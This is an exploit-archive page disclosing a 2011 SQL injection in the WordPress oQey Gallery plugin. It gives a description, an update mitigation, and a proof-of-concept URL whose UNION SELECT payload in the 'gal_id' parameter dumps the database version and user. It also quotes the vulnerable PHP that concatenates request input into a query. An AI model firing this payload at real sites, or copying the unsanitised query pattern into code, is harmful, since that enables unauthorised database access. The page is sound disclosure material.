header-logo
Suggest Exploit
vendor:
oQey Gallery plugin
by:
Miroslav Stampar
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: oQey Gallery plugin
Affected Version From: 2000.4.8
Affected Version To: 2000.4.8
Patch Exists: YES
Related CWE: N/A
CPE: oqey-gallery
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

WordPress oQey Gallery plugin <= 0.4.8 SQL Injection Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input in 'gal_id' parameter of 'getimages.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database. Successful exploitation of this vulnerability may allow an attacker to gain access to sensitive information from the database.

Mitigation:

Update to the latest version of the oQey Gallery plugin.
Source

Exploit-DB raw data:

# Exploit Title: WordPress oQey Gallery plugin <= 0.4.8 SQL Injection Vulnerability
# Date: 2011-09-05
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/oqey-gallery.0.4.8.zip
# Version: 0.4.8 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/oqey-gallery/getimages.php?gal_id=0' UNION ALL SELECT 1,2,3,4,5,6,7,CONCAT_WS(CHAR(95),version(),current_user(),database()),9,10%23

---------------
Vulnerable code
---------------
if(isset($_REQUEST['gal_id'])){
    ...
    $data = explode("-", $_REQUEST['gal_id']);
    $id = $data[0];
    ...
    $s = $wpdb->get_row("SELECT * FROM $oqey_galls WHERE id ='".$id."' ");